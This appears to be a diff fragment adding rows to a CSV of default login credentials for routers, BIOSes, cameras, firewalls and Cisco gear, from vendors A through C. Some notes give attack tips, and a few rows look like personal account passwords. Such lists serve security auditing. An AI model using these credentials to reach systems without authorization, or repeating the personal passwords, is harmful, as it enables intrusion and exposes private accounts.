4/25sl,,Multi,,,Admin,, +ast,powerexec 4/25sl,,,,,,, +ast,powerexec 4/25sl,,Admin,,,,, +asus,6310EV,,,adsl,adsl1234,,, +asus,6310EV,,Multi,adsl,adsl1234,,, +asus,ACPIBIOS,,,,,,, +asus,L3800,,,,,,, +asus,P5P800,,Multi,,admin,User,, +asus,WL-300,All,HTTP,admin,admin,Admin,, +asus,WL-500G Deluxe,,HTTP,admin,admin,Admin,, +asus,WL-500G,,HTTP,admin,admin,Admin,, +asus,WL-500G,1.7.5.6,HTTP,admin,admin,Admin,, +asus,WL-503G,All,HTTP,admin,admin,Admin,, +asus,WL-520G,,HTTP,admin,admin,Admin,, +asus,WL-HDD2.5,,,admin,admin,Admin,Default IP 192.168.1.220, +aszs,graphick,,jkl,Administrator,admin,,, +at&,T,,mcp,Console,,,, +at&t,3B2 Firmware,,,,mcp,,, +atcom,AG-168FC,,http://192.168.1.100,,12345678,Administration,, +atlantis,A02-RA141,,Multi,admin,atlantis,Admin,, +atlantis,I-Storm Lan Router ADSL ,,Multi,admin,atlantis,Admin,, +atlantis,Web Share RB,Web Share RB,http://192.168.1.1,santus,marika,,, +att,3B2 Firmware,,Console,,mcp,Admin,, +att,EP5962 2-Line Cordless Phone System,,by telephone,,5000,Mailbox access,, +att,Starlan SmartHUB,,,N/A,manager,,9.9, +attachmate,Attachmate Gateway,,,,PASSWORD,,, +attachmate,Attachmate Gateway,,Console,,PASSWORD,Admin,, +audioactive,MPEG Realtime Encoders,,,,telos,,, +audioactive,MPEG Realtime Encoders,,Telnet,,telos,Admin,, +autodesk,Autocad,,,autocad,autocad,,, +autodesk,Autocad,,Multi,autocad,autocad,User,, +autodesk,Autocad,,User,autocad,autocad,,, +avaya,4602 SIP Telephone,1.1.HTTP,admin,barney,,,, +avaya,CMS Supervisor,,11,root,cms500,,, +avaya,CMS Supervisor,11,Console,root,cms500,Admin,, +avaya,Cajun P33x,,Admin,,admin,,, +avaya,Cajun P33x,,firmware before 3.11.0,,admin,,, +avaya,Cajun P33x,firmware before 3.11.0,SNMP,,admin,Admin,, +avaya,Cajun P33x,firmware before 3.11.0,SNMP,,admin,Admin,check the Bugtraq archives for more information, +avaya,Cajun Pxxx,,,root,root,,, +avaya,Cajun Pxxx,,Admin,root,root,,, +avaya,Cajun Pxxx,,Multi,root,root,Admin,, +avaya,Cajun,,Admin,,,,, +avaya,Cajun,,Developer,diag,danger,,, +avaya,Cajun,,Developer,manuf,xxyyzz,,, +avaya,Cajun,,P550R P580 P880 and P882,diag,danger,,, +avaya,Cajun,,P550R P580 P880 and P882,manuf,xxyyzz,,, +avaya,Cajun,,P550R/P580/P880/P882,,,,, +avaya,Cajun,P550R P580 P880 and P882,Multi,diag,danger,Developer,, +avaya,Cajun,P550R P580 P880 and P882,Multi,manuf,xxyyzz,Developer,, +avaya,Cajun,P550R/P580/P880/P882,Telnet,,,Admin,, +avaya,Definity,,Admin,craft,,,, +avaya,Definity,,G3Si,craft,,,, +avaya,Definity,,Multi,dadmin,dadmin01,Admin,, +avaya,Definity,G3Si,Multi,craft,,Admin,, +avaya,IMD,,,admin,admin123,Admin,, +avaya,IP Office,500, 406,Default IP: 192.168.42.1, you can use ISDN modem to dial into remote systems- try last few numbers of ranges eg. xxxxxxxx99 or xxxxxxxx98, Administrator,Admin, +avaya,Pxxx,,5.2.14,diag,danger,,, +avaya,Pxxx,,5.2.14,manuf,xxyyzz,,, +avaya,Pxxx,,Admin,diag,danger,,, +avaya,Pxxx,,Admin,manuf,xxyyzz,,, +avaya,Pxxx,5.2.14,Multi,diag,danger,Admin,, +avaya,Pxxx,5.2.14,Multi,manuf,xxyyzz,Admin,, +avaya,Routers,Various,telnet,root,root,Admin,, +avaya,definity,,Admin,craft,crftpw,,, +avaya,definity,,up to rev. 6,craft,crftpw,,, +avaya,definity,up to rev. 6,any,craft,crftpw,Admin,, +avaya,g3R,,Admin,root,ROOT500,,, +avaya,g3R,,v6,root,ROOT500,,, +avaya,g3R,v6,Console,root,ROOT500,Admin,, +avaya,g3si,,,,,,, +avaya,routers,,,root,root,,, +avenger news system (ans),ANS,,,,Administrative,,, +avengernewssystem,Avenger News System,,HTTP,,Administrative,,default string: admin:aaLR8vE.jjhss:root@127.0.0.1 pass file is located at ans_data/ans.passwd (relative to ans.pl location), +award,6,,,,,,, +award,6.00PG,,,,,,, +award,BIOS,,,,lkwpeter,,, +award,BIOS,,Admin,,lkwpeter,,, +award,Bios,,6,,,,, +award,PC BIOS,,,,1322222,,, +award,PC BIOS,,,,SER,,, +award,PC BIOS,,,AWARD_SW,,,, +award,PC BIOS,,Admin,,01322222,,, +award,PC BIOS,,Admin,,256256,,, +award,PC BIOS,,Admin,,?award,,, +award,PC BIOS,,Admin,,AWARD_SW,,, +award,PC BIOS,,Admin,,BIOS,,, +award,PC BIOS,,Admin,,CONCAT,,, +award,PC BIOS,,Admin,,CONDO,,, +award,PC BIOS,,Admin,,HELGA-S,,, +award,PC BIOS,,Admin,,HEWITT RAND,,, +award,PC BIOS,,Admin,,HLT,,, +award,PC BIOS,,Admin,,PASSWORD,,, +award,PC BIOS,,Admin,,SER,,, +award,PC BIOS,,Admin,,SKY_FOX,,, +award,PC BIOS,,Admin,,SWITCHES_SW,,, +award,PC BIOS,,Admin,,SZYX,,, +award,PC BIOS,,Admin,,Sxyz,,, +award,PC BIOS,,Admin,,TTPTHA,,, +award,PC BIOS,,Admin,,TzqF,,, +award,PC BIOS,,Admin,,aLLy,,, +award,PC BIOS,,Admin,,aPAf,,, +award,PC BIOS,,Admin,,admin,,, +award,PC BIOS,,Admin,,alfarome,,, +award,PC BIOS,,Admin,,award,,, +award,PC BIOS,,Admin,,awkward,,, +award,PC BIOS,,Admin,,biosstar,,, +award,PC BIOS,,Admin,,biostar,,, +award,PC BIOS,,Admin,,g6PJ,,, +award,PC BIOS,,Admin,,h6BB,,, +award,PC BIOS,,Admin,,j09F,,, +award,PC BIOS,,Admin,,j256,,, +award,PC BIOS,,Admin,,j262,,, +award,PC BIOS,,Admin,,j322,,, +award,PC BIOS,,Admin,,j64,,, +award,PC BIOS,,Admin,,lkw peter,,, +award,PC BIOS,,Admin,,lkwpeter,,, +award,PC BIOS,,Admin,,setup,,, +award,PC BIOS,,Admin,,t0ch20x,,, +award,PC BIOS,,Admin,,t0ch88,,, +award,PC BIOS,,Admin,,wodj,,, +award,PC BIOS,,Admin,,zbaaaca,,, +award,PC BIOS,,Console,,(eight spaces),Admin,The password is eight spaces on some versions, +award,PC BIOS,,Console,,01322222,Admin,, +award,PC BIOS,,Console,,1322222,Admin,, +award,PC BIOS,,Console,,256256,Admin,, +award,PC BIOS,,Console,,589589,Admin,, +award,PC BIOS,,Console,,589721,Admin,, +award,PC BIOS,,Console,,595595,Admin,, +award,PC BIOS,,Console,,598598,Admin,, +award,PC BIOS,,Console,,?award,Admin,, +award,PC BIOS,,Console,,ALFAROME,Admin,, +award,PC BIOS,,Console,,ALLY,Admin,, +award,PC BIOS,,Console,,ALLy,Admin,, +award,PC BIOS,,Console,,AWARD PW,Admin,, +award,PC BIOS,,Console,,AWARD SW,Admin,, +award,PC BIOS,,Console,,AWARD?SW,Admin,, +award,PC BIOS,,Console,,AWARD_PW,Admin,, +award,PC BIOS,,Console,,AWARD_SW,Admin,, +award,PC BIOS,,Console,,AWKWARD,Admin,, +award,PC BIOS,,Console,,BIOS,Admin,, +award,PC BIOS,,Console,,BIOSTAR,Admin,, +award,PC BIOS,,Console,,CONCAT,Admin,, +award,PC BIOS,,Console,,CONDO,Admin,, +award,PC BIOS,,Console,,Condo,Admin,, +award,PC BIOS,,Console,,HELGA-S,Admin,, +award,PC BIOS,,Console,,HEWITT RAND,Admin,, +award,PC BIOS,,Console,,HLT,Admin,, +award,PC BIOS,,Console,,J256,Admin,, +award,PC BIOS,,Console,,J262,Admin,, +award,PC BIOS,,Console,,KDD,Admin,, +award,PC BIOS,,Console,,LKWPETER,Admin,, +award,PC BIOS,,Console,,Lkwpeter,Admin,, +award,PC BIOS,,Console,,PASSWORD,Admin,, +award,PC BIOS,,Console,,PINT,Admin,, +award,PC BIOS,,Console,,SER,Admin,, +award,PC BIOS,,Console,,SKY_FOX,Admin,, +award,PC BIOS,,Console,,SWITCHES_SW,Admin,, +award,PC BIOS,,Console,,SW_AWARD,Admin,, +award,PC BIOS,,Console,,SXYZ,Admin,, +award,PC BIOS,,Console,,SZYX,Admin,, +award,PC BIOS,,Console,,Sxyz,Admin,, +award,PC BIOS,,Console,,TTPTHA,Admin,, +award,PC BIOS,,Console,,TzqF,Admin,, +award,PC BIOS,,Console,,ZAAAADA,Admin,, +award,PC BIOS,,Console,,ZAAADA,Admin,, +award,PC BIOS,,Console,,ZBAAACA,Admin,, +award,PC BIOS,,Console,,ZJAAADC,Admin,, +award,PC BIOS,,Console,,_award,Admin,, +award,PC BIOS,,Console,,aLLY,Admin,, +award,PC BIOS,,Console,,aLLy,Admin,, +award,PC BIOS,,Console,,aPAf,Admin,, +award,PC BIOS,,Console,,admin,Admin,, +award,PC BIOS,,Console,,alfarome,Admin,, +award,PC BIOS,,Console,,award,Admin,, +award,PC BIOS,,Console,,award.sw,Admin,, +award,PC BIOS,,Console,,award_?,Admin,, +award,PC BIOS,,Console,,award_ps,Admin,, +award,PC BIOS,,Console,,awkward,Admin,, +award,PC BIOS,,Console,,biosstar,Admin,, +award,PC BIOS,,Console,,biostar,Admin,, +award,PC BIOS,,Console,,condo,Admin,, +award,PC BIOS,,Console,,d8on,Admin,, +award,PC BIOS,,Console,,djonet,Admin,, +award,PC BIOS,,Console,,efmukl,Admin,, +award,PC BIOS,,Console,,g6PJ,Admin,, +award,PC BIOS,,Console,,h6BB,Admin,, +award,PC BIOS,,Console,,j09F,Admin,, +award,PC BIOS,,Console,,j256,Admin,, +award,PC BIOS,,Console,,j262,Admin,, +award,PC BIOS,,Console,,j322,Admin,, +award,PC BIOS,,Console,,j64,Admin,, +award,PC BIOS,,Console,,kdd,Admin,, +award,PC BIOS,,Console,,lkw peter,Admin,, +award,PC BIOS,,Console,,lkwpeter,Admin,, +award,PC BIOS,,Console,,lkwpeter,Admin,Note - After 1996-12-19 Award required each OEM to set their own password, +award,PC BIOS,,Console,,pint,Admin,, +award,PC BIOS,,Console,,setup,Admin,, +award,PC BIOS,,Console,,sxyz,Admin,, +award,PC BIOS,,Console,,t0ch20x,Admin,, +award,PC BIOS,,Console,,t0ch88,Admin,, +award,PC BIOS,,Console,,wodj,Admin,, +award,PC BIOS,,Console,,zbaaaca,Admin,, +award,PC BIOS,,Console,,zjaaadc,Admin,, +award,award,,6,,,,, +award,bios,,1.0A,,,,, +award,bios,,4.6,admin,admin,,, +award,v4.51PG,,Admin,,SY_MB,,, +award,v4.51PG,,v4.51PG,,SY_MB,,, +award,v4.51PG,v4.51PG,Multi,,SY_MB,Admin,, +axent,NetProwler manager,,,administrator,admin,,WinNT, +axis,200 Network Camera,,,root,pass,,, +axis,200 V1.32,,,admin,,,, +axis,200+ Network Camera,,,root,pass,,, +axis,2100 Network Camera,,,root,pass,,, +axis,2110 Network Camera,,,root,pass,,, +axis,2120 Network Camera,,,root,pass,,, +axis,2420 Network Camera,,,root,pass,,, +axis,540 Print Server,,Multi,root,pass,Admin,, +axis,540+ Print Server,,Multi,root,pass,Admin,, +axis,542 Print Server,,Multi,root,pass,Admin,, +axis,All Axis Printserver,All,Multi,root,pass,Admin,, +axis,NETCAM,,200/240,root,pass,,, +axis,NETCAM,,Admin,root,pass,,, +axis,NETCAM,200/240,,root,pass,,, +axis,NETCAM,200/240,Telnet,root,pass,Admin,, +axis,NPS 530,,,root,pass,,5.02, +axis,StorPoint CD100,,,root,pass,,4.28, +axis,StorPoint CDE100,,,root,pass,,, +axis,StorPoint NAS 100,,,root,pass,,, +axis,Webcams,,HTTP,root,pass,Admin,, +axus,AXUS YOTTA,,Multi,,0,Admin,Storage DAS SATA to SCSI/FC, +aztech,DSL-600E,,HTTP,admin,admin,Admin,, +aztech,windows xp, all models,38.4.2,192.168.1.1,admin,admin,, +backtrack,backtrack 4,,CLI,root,toor,,, +barracudanetworks,Barracuda Spam Firewall 300,,http://:8000,admin,admin,full admin access,, +barracudanetworks,Barracuda Spam Firewall,3.3.01.001 to 3.3.03.053,http://:8080,admin,adminbn99,full admin access,, +barracudanetworks,Barracuda Spam Firewall,3.3.01.001 to 3.3.03.053,http://:8080,guest,bnadmin99,guest access - some information disclosure,, +barracudanetworks,Barracuda Spyware Firewall,,http://:8000,admin,admin,full admin access,, +bauschdatacom,Proxima PRI ADSL PSTN Router4 Wireless,,Multi,admin,epicrouter,Admin,, +bay networks,Router,,,Manager,,,, +bay networks,Router,,,User,,,, +bay networks,Router,,Admin,Manager,,,, +bay networks,Router,,User,User,,,, +bay networks,SuperStack II,,,security,security,,, +bay networks,SuperStack II,,Admin,security,security,,, +bay networks,Switch,,350T,,NetICs,,, +bay networks,Switch,,Admin,,NetICs,,, +baynetworks,ASN / ARN Routers,,,Manager,Manager,,Any, +baynetworks,Accelar 1xxx switches,,,rwa,rwa,,Any, +baynetworks,Remote Annex 2000,,,admin,IP address,,Any, +baynetworks,Router,,,User,,User,, +baynetworks,Router,,Telnet,Manager,,Admin,, +baynetworks,Router,,Telnet,User,,User,, +baynetworks,SuperStack II,,,security,security,Admin,, +baynetworks,SuperStack II,,Telnet,security,security,Admin,, +baynetworks,Switch,350T,,,NetICs,Admin,, +baynetworks,Switch,350T,Telnet,,NetICs,Admin,, +bea,WebLogic Process Integrator,,2.0,admin,security,,, +bea,WebLogic Process Integrator,,2.0,joe,password,,, +bea,WebLogic Process Integrator,,2.0,mary,password,,, +bea,WebLogic Process Integrator,,2.0,system,security,,, +bea,WebLogic Process Integrator,,2.0,wlcsystem,wlcsystem,,, +bea,WebLogic Process Integrator,,2.0,wlpisystem,wlpisystem,,, +bea,WebLogic,,,system,weblogic,,, +bea,WebLogic,,Admin,system,weblogic,,, +bea,WebLogic,,https,system,weblogic,Admin,, +bea,WebLogic,9.0 beta (Diablo),,weblogic,weblogic,,, +bea,Weblogic Process Integrator,2.0,,admin,security,,, +bea,Weblogic Process Integrator,2.0,,joe,password,,, +bea,Weblogic Process Integrator,2.0,,mary,password,,, +bea,Weblogic Process Integrator,2.0,,system,security,,, +bea,Weblogic Process Integrator,2.0,,wlcsystem,wlcsystem,,, +bea,Weblogic Process Integrator,2.0,,wlpisystem,wlpisystem,,, +bea,Weblogic,,,system,weblogic,,5.1, +becu,accpints summary,,,musi1921,Musii%1921,,, +beetal,220x ADSL router,any,http://192.168.1.1,admin,password,admin,should be same for all routers, +belkin,Belkin_N+_61F980,,Password,Belkin_N+_61F980,,,, +belkin,F1PG200ENau,,,,admin,,, +belkin,F5D5231-4,,http://192.168.2.1,,,Administration,, +belkin,F5D6130,,,,MiniAP,,, +belkin,F5D6130,,Admin,,MiniAP,,, +belkin,F5D6130,,SNMP,,MiniAP,Admin,Wireless Acess Point IEEE802.11b, +belkin,F5D6231-4 Router,,,,,,, +belkin,F5D6231-4,,V1.0 - 2.0,,,,, +belkin,F5D7150,FB,Multi,,admin,Admin,, +belkin,F5D7230-4 Router,,,,,,, +belkin,F5D7231-4,,http://192.168.2.1,,,Administration,, +belkin,F5D7234 4V1,1002,,insight_wifi_1902,lgibson5405,,, +belkin,F5D8230-4,,http://192.168.2.1,,,Administration,, +belkin,F5D9230-4,,http://192.168.2.1,user:,,Administration,, +belkin,F5U025 USB Flash drive,,,,1111,,, +belkin,F8T030 Bluetooth AP,,,guest,guest,,Bluetooth passkey: belkin, +belkin,P74476au,,http://10.0.0.2,admin,password,,, +belkin,PRO 3 KVM switch,,Console,admin,belkin,Admin,, +belkin,Wireless ADSL Modem/Router,,Full,admin,,,, +belkin,Wireless ADSL Modem/Router,,Multi,admin,,Full,, +belkin,f5d9230-4,,192.168.2.1,admin,admin,,, +benq,awl 700 wireless router,1.3.6 Beta-002,Multi,admin,admin,Admin,, +bestpractical,RT,,,root,password,,, +bestpractical,RT,,HTTP,root,password,Admin,, +betabrite,1026,,,,LLLLLL,Sign programming,Reset sign password, +betabrite,1036,,,,LLLLLL,Sign programming,Reset sign password, +betabrite,1040,,,,LLLLLL,Sign programming,Reset sign password, +betabrite,Prism 1196,,,,LLLLLL,Sign programming,Reset sign password, +betabrite,Prism full-colour LED sign,,,,,Sign programming,The sign has no password by default but if it does you can reset it by entering LLLLLL then a new password at the password prompt. Password is always 6 characters., +bewan,Wireless Routers,,,bewan,bewan,Admin,, +billion,BiPAC 5100,,HTTP,admin,admin,Admin,, +billion,BiPAC 5102,,http://192.168.1.254,admin,admin,Administration,, +billion,BiPAC 640 AC,640AE100,HTTP,,,Admin,, +billion,BiPAC 6600,,http://192.168.1.254,,,Administration,, +billion,BiPAC 7202G,,http://192.168.1.254,admin,admin,Administration,, +billion,BiPAC 7402VGP,,http://192.168.1.254,admin,admin,Administration,, +bintec,Bianca/Brick,,XM-5.1,,snmp-Trap,,, +bintec,Bianca/Brick,,read/write,,snmp-Trap,,, +bintec,Bianca/Brick,XM-5.1,SNMP,,snmp-Trap,read/write,, +bintec,Bianka ,,admin bintec,Admin,No,,, +bintec,Bianka Routers,,,admin,bintec,,, +bintec,Bianka Routers,,Admin,admin,bintec,,, +bintec,Bianka Routers,,Multi,admin,bintec,Admin,, +bintec,all Routers,,,admin,bintec,,Any, +bintec,x1200,37834,Multi,admin,bintec,Admin,, +bintec,x2300i,37834,Multi,admin,bintec,Admin,, +bintec,x3200,37834,Multi,admin,bintec,Admin,, +biodata,BIGfire,,,,Babylon,,, +biodata,Babylon,,,,Babylon,,, +biodata,Bigfire +,,Admin,config,biodata,,, +biodata,Bigfire +,,Multi,config,biodata,Admin,, +biostar,PC BIOS,,,,Biostar,,, +biostar,PC BIOS,,Admin,,Biostar,,, +biostar,PC BIOS,,Admin,,Q54arwms,,, +biostar,PC BIOS,,Console,,Biostar,Admin,, +biostar,PC BIOS,,Console,,Q54arwms,Admin,, +bizdesign,ImageFoliio,,2.2,Admin,ImageFolio,,, +bizdesign,ImageFolio Pro,,2.2,Admin,ImageFolio,,, +bizdesign,ImageFolio Pro,2.2,HTTP,Admin,ImageFolio,Admin,default admin page is:/cgi-bidmidmin.cgi, +bizdesign,ImageFolio,2.2,HTTP,Admin,ImageFolio,Admin,, +blackberry,Pearl,,,Password Keeper,By default has no password, +blackbox,BLACK BOX ServSensor JR,,,Administrator,public,,, +blackbox,BLACK BOX ServSensor JR,v2.0,HTTP,Administrator,public,,, +blackwidowwebdesignltd,Saxon,5.4,http,admin,nimda,Admin,, +bluecoatsystems,ProxySG,3.x,HTTP,admin,articon,Admin,access to command line interface via ssh and web gui, +bmc software,Patrol,,Admin,Administrator,the same all over,,, +bmc software,Patrol,,all,Administrator,the same all over,,, +bmc,Patrol,,6,patrol,patrol,,, +bmc,Patrol,,User,patrol,patrol,,, +bmc,Patrol,6.0,Multi,patrol,patrol,User,, +bmc,Patrol,all,BMC unique,Administrator,the same all over,Admin,this default user normally for ALL system in this area with one Password, +borland,Interbase,,,,,,, +borland,Interbase,,,,,,Any, +borland,Interbase,,,SYSDBA,masterkey,,any, +borland,Interbase,,,politcally,correct,,Any, +borland,Interbase,,,politically,correct,,, +borri,CS131,all versions,http,admin,UpsMon,,, +boson,router simulator,,Admin,,,,, +boson,router simulator,3.66,Multi,,,Admin,, +breezecom,Breezecom Adapters,,2.x,,laflaf,,, +breezecom,Breezecom Adapters,,3.x,,Master,,, +breezecom,Breezecom Adapters,,4.4.x,,Helpdesk,,, +breezecom,Breezecom Adapters,,4.x,,Super,,, +breezecom,Breezecom Adapters,,Admin,,Master,,, +breezecom,Breezecom Adapters,,Admin,,Super,,, +breezecom,Breezecom Adapters,,Admin,,laflaf,,, +breezecom,Breezecom Adapters,2.x,,,laflaf,,, +breezecom,Breezecom Adapters,2.x,,,laflaf,Admin,, +breezecom,Breezecom Adapters,3.x,,,Master,,, +breezecom,Breezecom Adapters,3.x,,,Master,Admin,, +breezecom,Breezecom Adapters,4.4.x,Console,,Helpdesk,Admin,, +breezecom,Breezecom Adapters,4.x,,,Super,,, +breezecom,Breezecom Adapters,4.x,,,Super,Admin,, +breezecom,SA10,,,,,,, +broadlogic,XLT router,,HTTP,webadmin,webadmin,Admin,, +broadlogic,XLT router,,Telnet,admin,admin,Admin,, +broadlogic,XLT router,,Telnet,installer,installer,Admin,, +broadmax,LinkMax HSA300A-2,,http://192.168.0.1,broadmax,broadmax,Admin,You need to put the IP as Gateway in TCPIP settings and 192.168.0.2 as your assigned IP., +brocade,Fabric OS,,3.x,admin,password,,, +brocade,Fabric OS,,3.x,root,fivranne,,, +brocade,Fabric OS,,All,root,fivranne,,, +brocade,Fabric OS,,Multi,admin,password,Admin,Gigabit SAN, +brocade,Fabric OS,All,Multi,root,fibranne,Admin,, +brocade,Fabric OS,All,Multi,root,fivranne,Admin,Gigiabit SAN (), +brocade,Silkworm,all,Multi,admin,password,Admin,Also on other Fiberchannel switches, +brother,HL-1270n,,,,access,,, +brother,HL-1270n,,Multi,,access,network board access,, +brother,HL-1270n,,network board access,,access,,, +brother,HL-3040CN,,,admin,access,,, +brother,MFC Network-capable printers,all versions,http,admin,access,,, +brother,MFC-8860DB,,,admin,access,,, +brother,NC-3100h,,,,access,,, +brother,NC-3100h,,,,access,network board access,, +brother,NC-3100h,,network board access,,access,,, +brother,NC-4100h,,,,access,,, +brother,NC-4100h,,,,access,network board access,, +brother,NC-4100h,,network board access,,access,,, +brother,QL-580N,,,admin,access,,, +bt,HomeHub,,192.168.1.254,admin,admin,Admin,, +bt,Voyager 2000,,,admin,admin,,, +bt,Voyager 2000,,,admin,admin,Admin,, +bt,Voyager 240,,,admin,admin,Admin,, +buffalo,AirStation WLA-L11,,,root,,,Root acct cannot be changed, no password by default, +buffalo,BBR-4MG and BBR-4HG,ALL,HTTP,root,,Admin,, +buffalo,WHR3-G54 Router,,,root,,,, +buffalo,Wireless Broadband Base Station-g ,WLA-G54 WBR-G54,HTTP,root,,Admin,http://192.168.11.1, +buffalo,Wireless Broadband Base Station-g,,WLA-G54 WBR-G54,root,,,, +buffalo/melco,AirStation,,,root,,,, +cableandwireless,ADSL Modem/Router,,Multi,admin,1234,Admin,, +cabletron,Netgear modem/router and SSR,,,netman,,,, +cabletron,Netgear modem/router and SSR,,,netman,,Admin,, +cabletron,Netgear modem/router and SSR,,Admin,netman,,,, +cabletron,routers & switches,,,,,,, +cabletron,routers &,,,,,,, +canon,iR1023,,Administrator,,0000,,, +canyon,router,,Multi,Administrator,admin,Admin,, +castlenet,,,http,MSO,changeme,ROOT,, +cayman,3220-H DSL Router,,,Any,,,GatorSurf 5., +cayman,Cayman DSL,,,,,,, +cayman,Cayman DSL,,,,,Admin,, +cayman,Cayman DSL,,3220-H,},,,, +cayman,Cayman DSL,,Admin,,,,, +cayman,Cayman DSL,,Admin,},,,, +cayman,Cayman DSL,3220-H,,},,Admin,, +cayman,Cayman DSL,SBC/Pacbell,,admin,(device serial number),Admin,, +cayman,DSL Router,,,admin,(serial number),,, +celerity,Mediator,,,root,Mau,,, +celerity,Mediator,,Admin,root,Mau dib,,, +celerity,Mediator,,Multi,mediator,mediator,,, +celerity,Mediator,,Multi,root,Mau'dib,Admin,Assumption: the password is Mua'dib, +celerity,Mediator,,User,mediator,mediator,,, +celerity,Mediator,Multi,Multi,mediator,mediator,User,, +cellit,CCPro,,Multi,cellit,cellit,Admin,, +cgi world,Poll It,,v2.0,,protection,,, +cgiworld,Poll It,2.0,HTTP,,protection,User/Admin over package,http://server.com/ScriptName.cgi?load=login, +chase research,Iolan,,,,iolan,,, +chaseresearch,Iolan,,,,iolan,,, +checkpoint,,,,admin,qaz123,,, +checkpoint,Firewall-1,,Multi,admin,abc123,admin,, +checkpoint,Firewall-1,,admin,admin,abc123,,, +checkpoint,Interspect 210,,SSH/Con/Serial,admin,admin,Admin,, +checkpoint,Interspect 210N,,SSH/Con/Serial,admin,admin,Admin,, +checkpoint,Interspect 410,,SSH/Con/Serial,admin,admin,Admin,, +checkpoint,Interspect 610,,SSH/Con/Serial,admin,admin,Admin,, +checkpoint,Interspect 610S,,SSH/Con/Serial,admin,admin,Admin,, +checkpoint,SecurePlatform,,Admin,admin,admin,,, +checkpoint,SecurePlatform,,NG FP3,admin,admin,,, +checkpoint,SecurePlatform,NG FP3,Console,admin,admin,Admin,, +chuming chen,NessusWeb,,,administrator,adminpass,,, +chumingchen,NessusWeb,,HTTP,administrator,adminpass,Admin,, +ciphertrust,IronMail,Any,Multi,admin,password,Admin,, +cisco,1100,,,,Cisco,Admin,, +cisco,1200,,,Cisco,Cisco,Admin,, +cisco,1300,,,Cisco,Cisco,Admin,, +cisco,1400,,,,Cisco,Admin,, +cisco,2100 aka DPX2100,all versions (comcast-supplied),http://192.168.100.1,,W2402,,password case sensitive, +cisco,2600,,Telnet,Administrator,admin,Admin,, +cisco,AIR-AP1231G-A-K9,,,Cisco,Cisco,,, +cisco,AIR-AP1231G-A-K9,,,Cisco,Cisco,Admin,Default SSID is tsunami. Username/password are case sensitive., +cisco,AP1200,IOS,Multi,Cisco,Cisco,Admin,This is when you convert AP1200 or AP350 to IOS, +cisco,ATA 186,,,admin,,Admin,, +cisco,Aironet 1100,,webadmin,Cisco,Cisco,,, +cisco,Aironet 1100,AP1120B-E-K9,HTTP,Cisco,Cisco,webadmin,, +cisco,Aironet 1200,,,Cisco,Cisco,,, +cisco,Aironet 1200,,HTTP,root,Cisco,Admin,, +cisco,Aironet 1200,,Multi,Cisco,Cisco,,, +cisco,Aironet 1350,,HTTP,admin,tsunami,webadmin,, +cisco,Aironet 1350,,webadmin,admin,tsunami,,, +cisco,Aironet,,Multi,,_Cisco,Admin,, +cisco,Aironet,,Multi,Cisco,Cisco,Admin,, +cisco,Any Router and Switch,,,cisco,cisco,,10 thru 12, +cisco,Arrowpoint,,,admin,system,Admin,, +cisco,BBSD MSDE Client,,5.0 and 5.1,bbsd-client,NULL,,, +cisco,BBSD MSDE Client,,database,bbsd-client,NULL,,, +cisco,BBSD MSDE Client,5.0 and 5.1,Telnet or Named Pipes,bbsd-client,NULL,database,The BBSD Windows Client password will match the BBSD MSDE Client password, +cisco,BBSM Administrator,,5.0 and 5.1,Administrator,changeme,,, +cisco,BBSM Administrator,,Admin,Administrator,changeme,,, +cisco,BBSM Administrator,5.0 and 5.1,Multi,Administrator,changeme,Admin,, +cisco,BBSM MSDE Administrator,,5.0 and 5.1,sa,,,, +cisco,BBSM MSDE Administrator,,Admin,sa,,,, +cisco,BBSM MSDE Administrator,5.0 and 5.1,IP and Named Pipes,sa,,Admin,, +cisco,BBSM,,5.0 and 5.1,bbsd-client,changeme2,,, +cisco,BBSM,,database,bbsd-client,changeme2,,, +cisco,BBSM,5.0 and 5.1,Telnet or Named Pipes,bbsd-client,changeme2,database,The BBSD Windows Client password will match the BBSD MSDE Client password, +cisco,CNR,,Admin,admin,changeme,,, +cisco,CNR,,All,admin,changeme,,, +cisco,CNR,All,CNR GUI,admin,changeme,Admin,This is the default password for Cisco Network Registrar, +cisco,Cache Engine,,,admin,diamond,,, +cisco,Cache Engine,,Admin,admin,diamond,,, +cisco,Cache Engine,,Console,admin,diamond,Admin,, +cisco,Catalyst 4000/5000/6000,,All,,public/private/secret,,, +cisco,Catalyst 4000/5000/6000,,RO/RW/RW+change SNMP config,,public/private/secret,,, +cisco,Catalyst 4000/5000/6000,All,SNMP,,public/private/secret,RO/RW/RW+change SNMP config,default on All Cat switches running the native CatOS CLI software., +cisco,Cisco Broadband Troubleshooter,,,admin,changeme,,, +cisco,Cisco Guard,,SNMP,,riverhead,,, +cisco,Cisco IDS,,,root,attack,,, +cisco,Cisco Works,,,admin,admin,,, +cisco,CiscoWorks 2000,,,admin,cisco,,, +cisco,CiscoWorks 2000,,,admin,cisco,Admin,, +cisco,CiscoWorks 2000,,,guest,,,, +cisco,CiscoWorks 2000,,,guest,,User,, +cisco,CiscoWorks 2000,,Admin,admin,cisco,,, +cisco,CiscoWorks 2000,,User,guest,,,, +cisco,CiscoWorks,,Multi,admin,admin,,, +cisco,Ciso Aironet 1100 series,Rev. 01,HTTP,,Cisco,Admin,, +cisco,ConfigMaker Software,,,,cmaker,,any?, +cisco,ConfigMaker,,,cmaker,cmaker,,, +cisco,ConfigMaker,,,cmaker,cmaker,Admin,, +cisco,ConfigMaker,,Admin,cmaker,cmaker,,, +cisco,Content Engine,,Telnet,admin,default,Admin,, +cisco,E3000,,192.168.1.1,admin,admin,admin,, +cisco,GSR,,Telnet,admin,admin,admin,, +cisco,HSE,,Multi,hsa,hsadb,Admin,, +cisco,HSE,,Multi,root,blender,Admin,, +cisco,IDS (netranger),,,root,attack,,, +cisco,IOS,,,,Cisco router,,, +cisco,IOS,,,,c,,, +cisco,IOS,,,,cc,,, +cisco,IOS,,,,cisco,,, +cisco,IOS,,,cisco,cisco,,, +cisco,IOS,,,enable,cisco,,, +cisco,IOS,,,private ReadWrite access,secret,,, +cisco,IOS,,,public ReadOnly access,secret,,, +cisco,IOS,,,ripeop,(no pw),,, +cisco,IOS,,11.x-12.x,,ILMI,,, +cisco,IOS,,12.1(3),,cable-docsis,,, +cisco,IOS,,2600 series,,c,,, +cisco,IOS,,Admin,,c,,, +cisco,IOS,,Multi,,Cisco router,,, +cisco,IOS,,Multi,,c,Admin,, +cisco,IOS,,Multi,,cc,,, +cisco,IOS,,Multi,,cisco,,, +cisco,IOS,,Multi,cisco,cisco,,, +cisco,IOS,,Multi,enable,cisco,,, +cisco,IOS,,Multi,ripeop,,,, +cisco,IOS,,SNMP read-write,,cable-docsis,,, +cisco,IOS,,SNMP,private ReadWrite access,secret,Read/write,, 